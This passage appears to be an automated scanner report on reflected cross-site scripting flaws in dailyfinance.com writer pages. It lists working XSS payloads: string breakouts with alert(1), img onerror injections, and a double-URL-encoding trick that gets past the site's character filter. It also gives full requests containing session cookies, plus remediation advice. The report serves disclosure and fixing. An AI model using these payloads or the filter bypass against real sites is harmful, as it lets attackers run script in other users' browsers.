The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef8df"-alert(1)-"1778d902ef8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/jean-chatzky/?ef8df"-alert(1)-"1778d902ef8=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22f2e"><img%20src%3da%20onerror%3dalert(1)>9e05323ba38 was submitted in the REST URL parameter 2. This input was echoed as 22f2e"><img src=a onerror=alert(1)>9e05323ba38 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/jonathan-berr22f2e"><img%20src%3da%20onerror%3dalert(1)>9e05323ba38/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b234a%2522%253b98887a3489 was submitted in the REST URL parameter 2. This input was echoed as b234a";98887a3489 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/jonathan-berrb234a%2522%253b98887a3489/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
s_265.prop1="Writers"; s_265.prop2="Jonathan Ber ...[SNIP]...
1.507. http://www.dailyfinance.com/writers/jonathan-berr/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/jonathan-berr/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c43a"-alert(1)-"62aa7e5ffc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/jonathan-berr/?6c43a"-alert(1)-"62aa7e5ffc=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d62ac"><img%20src%3da%20onerror%3dalert(1)>adcc6ec6c90 was submitted in the REST URL parameter 2. This input was echoed as d62ac"><img src=a onerror=alert(1)>adcc6ec6c90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/joseph-lazzarod62ac"><img%20src%3da%20onerror%3dalert(1)>adcc6ec6c90/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1ae6%2522%253ba45526d75e4 was submitted in the REST URL parameter 2. This input was echoed as b1ae6";a45526d75e4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/joseph-lazzarob1ae6%2522%253ba45526d75e4/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.510. http://www.dailyfinance.com/writers/joseph-lazzaro/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/joseph-lazzaro/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9d2c"-alert(1)-"48ffafa5a46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/joseph-lazzaro/?a9d2c"-alert(1)-"48ffafa5a46=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ea06%2522%253be7ab5b21b20 was submitted in the REST URL parameter 2. This input was echoed as 7ea06";e7ab5b21b20 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/matthew-pulomena7ea06%2522%253be7ab5b21b20/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4568"><img%20src%3da%20onerror%3dalert(1)>97148da6843 was submitted in the REST URL parameter 2. This input was echoed as a4568"><img src=a onerror=alert(1)>97148da6843 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/matthew-pulomenaa4568"><img%20src%3da%20onerror%3dalert(1)>97148da6843/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Matthew Pulomenaa4568"><img Src=a Onerror=alert(1)>97148da6843" /> ...[SNIP]...
1.513. http://www.dailyfinance.com/writers/matthew-pulomena/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/matthew-pulomena/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44c61"-alert(1)-"399a3cc268e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/matthew-pulomena/?44c61"-alert(1)-"399a3cc268e=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e717f%2522%253b143a6ec7601 was submitted in the REST URL parameter 2. This input was echoed as e717f";143a6ec7601 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/matthew-scotte717f%2522%253b143a6ec7601/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58323"><img%20src%3da%20onerror%3dalert(1)>91749706519 was submitted in the REST URL parameter 2. This input was echoed as 58323"><img src=a onerror=alert(1)>91749706519 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/matthew-scott58323"><img%20src%3da%20onerror%3dalert(1)>91749706519/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Matthew Scott58323"><img Src=a Onerror=alert(1)>91749706519" /> ...[SNIP]...
1.516. http://www.dailyfinance.com/writers/matthew-scott/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/matthew-scott/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3641"-alert(1)-"583f7580ff6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/matthew-scott/?c3641"-alert(1)-"583f7580ff6=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a226"><img%20src%3da%20onerror%3dalert(1)>24a1bd72e09 was submitted in the REST URL parameter 2. This input was echoed as 5a226"><img src=a onerror=alert(1)>24a1bd72e09 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/mercedes-cardona5a226"><img%20src%3da%20onerror%3dalert(1)>24a1bd72e09/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb7c%2522%253b16627f19223 was submitted in the REST URL parameter 2. This input was echoed as feb7c";16627f19223 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/mercedes-cardonafeb7c%2522%253b16627f19223/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
s_265.prop1="Writers"; s_265.prop2="Mercedes Car ...[SNIP]...
1.519. http://www.dailyfinance.com/writers/mercedes-cardona/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/mercedes-cardona/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c57c7"-alert(1)-"65bd3b8cd75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/mercedes-cardona/?c57c7"-alert(1)-"65bd3b8cd75=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9eab%2522%253ba8e637537d7 was submitted in the REST URL parameter 2. This input was echoed as a9eab";a8e637537d7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/peter-cohana9eab%2522%253ba8e637537d7/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0d3c"><img%20src%3da%20onerror%3dalert(1)>ac470910a2d was submitted in the REST URL parameter 2. This input was echoed as d0d3c"><img src=a onerror=alert(1)>ac470910a2d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/peter-cohand0d3c"><img%20src%3da%20onerror%3dalert(1)>ac470910a2d/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Peter Cohand0d3c"><img Src=a Onerror=alert(1)>ac470910a2d" /> ...[SNIP]...
1.522. http://www.dailyfinance.com/writers/peter-cohan/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/peter-cohan/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85a2b"-alert(1)-"9b924732f25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/peter-cohan/?85a2b"-alert(1)-"9b924732f25=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e970%2522%253bcf72074392b was submitted in the REST URL parameter 2. This input was echoed as 1e970";cf72074392b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/trey-thoelcke1e970%2522%253bcf72074392b/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdc12"><img%20src%3da%20onerror%3dalert(1)>d2cbddcc6eb was submitted in the REST URL parameter 2. This input was echoed as bdc12"><img src=a onerror=alert(1)>d2cbddcc6eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
